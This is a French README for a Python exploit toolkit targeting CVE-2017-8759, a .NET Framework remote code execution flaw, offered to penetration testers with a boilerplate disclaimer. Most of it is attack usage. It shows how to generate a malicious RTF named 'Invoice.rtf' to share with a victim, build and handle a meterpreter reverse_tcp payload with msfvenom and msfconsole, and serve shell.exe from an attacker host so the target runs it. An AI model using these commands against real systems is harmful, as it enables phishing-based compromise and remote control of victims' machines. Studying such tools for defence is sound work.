
Le toolkit d'exploitation CVE-2017-8759 - v1.0 est un script Python pratique qui offre aux testeurs d'intrusion et aux chercheurs en sécurité un moyen rapide et efficace de tester l'exécution de code à distance (RCE) du Microsoft .NET Framework. Il peut générer un fichier RTF malveillant et délivrer une charge utile metasploit / meterpreter / autre à la victime sans configuration complexe.
Ce programme est UNIQUEMENT à des fins éducatives. Ne l'utilisez pas sans autorisation. La clause de non-responsabilité habituelle s'applique, notamment le fait que moi (bhdresh) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet n'assume AUCUNE responsabilité quant au contenu ou à la mauvaise utilisation de ces programmes ou de leurs dérivés. En utilisant ce programme, vous acceptez le fait que tout dommage (perte de données, panne système, compromission système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de bhdresh.
Enfin, ceci est un développement personnel, veuillez respecter sa philosophie et ne l'utilisez pas pour de mauvaises choses !
Licence CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
Les capacités suivantes ont été introduites dans le script
- Générer un fichier RTF malveillant
- Mode d'exploitation pour le fichier RTF généré
Version : Python version 2.7.13
1) Générer un fichier RTF malveillant
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optionnel, si vous utilisez une charge utile MSF) : Générer une charge utile metasploit et démarrer le gestionnaire
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Démarrer le toolkit en mode exploitation pour délivrer une charge utile locale
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
Ceci est un toolkit pratique pour exploiter CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes :
-M gen Générer uniquement un fichier malveillant
Générer un fichier RTF malveillant :
-w <Filename.rtf> Nom du fichier RTF malveillant (partagez ce fichier avec la victime).
-u <http://attacker.com/test.txt> Chemin du fichier txt distant. Normalement, il doit s'agir d'un domaine ou d'une IP où cet outil s'exécute.
Par exemple, http://attackerip.com/test.txt (Cette URL sera incluse dans le fichier RTF malveillant et sera demandée une fois que la victime ouvrira le fichier RTF malveillant.
-M exp Démarrer le mode exploitation
Exploitation :
-p <TCP port:Default 80> Numéro de port local.
-e <http://attacker.com/shell.exe> Le chemin d'un fichier exécutable / shell meterpreter / charge utile qui doit être exécuté sur la cible.
-l </tmp/shell.exe> Spécifiez le chemin local d'un fichier exécutable / shell meterpreter / charge utile.
@bhdresh
@Voulnet, @vysec, @bhdresh
Évidemment, je ne suis pas un développeur à temps plein, attendez-vous donc à quelques accrocs.
Veuillez signaler les bogues et les problèmes via https://github.com/bhdresh/CVE-2017-8759/issues/new